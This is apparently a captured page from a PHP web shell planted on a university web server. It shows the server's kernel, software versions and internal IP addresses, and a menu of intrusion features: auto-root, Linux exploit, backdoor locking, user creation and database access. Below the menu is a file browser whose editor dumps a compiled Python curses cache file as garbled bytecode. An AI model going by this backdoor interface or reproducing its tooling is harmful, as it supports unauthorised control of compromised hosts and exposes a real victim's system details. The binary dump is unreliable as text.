Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
curses /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
ascii.cpython-310.pyc
3.53
KB
-rw-r--r--
has_key.cpython-310.pyc
4.79
KB
-rw-r--r--
__init__.cpython-310.pyc
1.81
KB
-rw-r--r--
panel.cpython-310.pyc
226
B
-rw-r--r--
textpad.cpython-310.pyc
5.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.cpython-310.pyc
o � i) � @ s` d Z ddlT ddlZddlZdd� Zdd� Zze W n e y) dd lmZ Y nw d d� Z dS )z�curses The main package for curses support for Python. Normally used by importing the package, and perhaps a particular module inside it. import curses from curses import textpad curses.initscr() ... � )�*Nc C sp dd l } dd l}ttj�dd�tj�� d� | � � }| j �� D ]\}}|dd� dks/|dv r5t|||� q|S )Nr �TERM�unknown)�term�fd� �ACS_)�LINES�COLS) �_curses�curses� setupterm�_os�environ�get�_sys� __stdout__�fileno�initscr�__dict__�items�setattr)r r �stdscr�key�value� r �&/usr/lib/python3.10/curses/__init__.pyr s ��r c C s@ dd l } dd l}| �� }t| d�r| j|_t| d�r| j|_|S )Nr �COLORS�COLOR_PAIRS)r r �start_color�hasattrr r )r r �retvalr r r r * s r � )�has_keyc O s� z8t � }t� t� |�d� zt� W n Y | |g|�R i |��W dt� v r8|�d� t� t� t� S S dt� v rM|�d� t� t� t� w w )a Wrapper function that initializes curses and calls another function, restoring normal keyboard/screen behavior on error. The callable object 'func' is then passed the main window 'stdscr' as its first argument, followed by any other arguments passed to wrapper(). r"